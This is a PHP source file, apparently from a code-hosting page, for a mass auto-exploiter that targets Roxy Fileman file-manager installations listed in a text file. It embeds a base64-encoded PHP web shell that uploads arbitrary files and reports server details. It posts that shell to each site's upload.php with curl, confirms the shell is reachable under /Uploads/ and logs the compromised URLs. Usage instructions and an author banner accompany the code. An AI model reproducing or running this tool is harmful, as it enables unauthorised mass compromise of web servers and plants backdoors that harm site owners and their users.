/
roxyfm.php
91 lines (84 loc) · 3.07 KB
/
roxyfm.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
<?php
# Created By N4ST4R_ID
# Recode? lo ampas tq hehe
# Atur sendiri nama shell klu lo mau jg
class Exployit {
private $cih,
$opt,
$sex,
$shek,
$shell = "nastar.php.phpgif";
public function ngews($lis) {
$this->saveme($this->shell, "w", base64_decode("PD9waHAKZWNobyAiPGI+TjRTVDRSX0lEIC0gVXBsb2FkZXI8L2I+IjsKZWNobyAiPGJyPiIucGhwX3VuYW1lKCkuIjxicj4iOwplY2hvICI8Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPgo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0nbmFzdGFyJz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPgo8L2Zvcm0+IjsKaWYoJF9QT1NUWyd1cGxvYWQnXSkgewoJaWYoQGNvcHkoJF9GSUxFU1snbmFzdGFyJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ25hc3RhciddWyduYW1lJ10pKSB7CgllY2hvICJNQU5UVUwgTVpaIjsKCX0gZWxzZSB7CgllY2hvICJOSklSIEdBR0FMIjsKCX0KfQo/Pg=="));
print "[*] Exploiting ".$lis."\n";
$njay = $lis."/php/upload.php";
if($this->xoex($njay)->info == 200) {
@shell_exec("curl --silent --connect-timeout 5 -X POST -F \"files[]=@".$this->shell."\" \"$njay\"");
$shex = $lis."/Uploads/".$this->shell;
if(preg_match("/N4ST4R_ID/", $this->xoex($shex)->exe) AND $this->xoex($shex)->info == 200) {
print "[+] Success upload shell > ".$shex."\n";
$this->saveme("result.txt", "a+", $shex);
if(file_exists("result.txt")) {
print "[+] Success save the result in result.txt\n\n";
}
} else {
print "[-] Upload shell failed :'( > ".$lis."\n\n";
}
} else {
print "[-] File upload.php not found ".$lis."\n\n";
}
}
private function xoex($jncx) {
$this->cih = curl_init();
$this->opt =
[
CURLOPT_URL => $jncx,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_CONNECTTIMEOUT => 5,
CURLOPT_TIMEOUT => 5,
CURLOPT_RETURNTRANSFER => true
];
curl_setopt_array($this->cih, $this->opt);
$this->sex = curl_exec($this->cih);
$this->shek = curl_getinfo($this->cih, CURLINFO_HTTP_CODE);
curl_close($this->cih);
return (object)
[
"info" => $this->shek,
"exe" => $this->sex
];
}
public function bannedlo () {
print "
____
| _ \ _____ ___ _
| |_) / _ \ \/ / | | | Filemanager
| _ < (_) > <| |_| | Mass auto
|_| \_\___/_/\_\\\__, | Exploiter
|___/
Coded by : N4ST4R_ID
Github : https://github.com/nastar-id
Facebook : Muhammad Rasyad
Blog : https://www.nyamuxpl0it.cf
Attention : Put your sites in list.txt 'site.com/path-to-roxyfm/'
For example : https://www.nyamuxpl0it.cf/admin/fileman/
\n";
}
private function saveme($asu, $asw, $asuw) {
$su = fopen($asu, $asw);
fwrite($su, $asuw."\n");
fclose($su);
}
}
$pig = new Exployit();
system("clear");
$pig->bannedlo();
if(empty($argv[1])) exit("[-] Usage: php {$argv[0]} list.txt\n");
if(empty(file_exists($argv[1]))) exit("[-] File {$argv[1]} not found!\n");
$trog = trim($argv[1]);
$getex = explode("\n", file_get_contents($trog));
foreach($getex as $ketex) {
$pig->ngews($ketex);
}
?>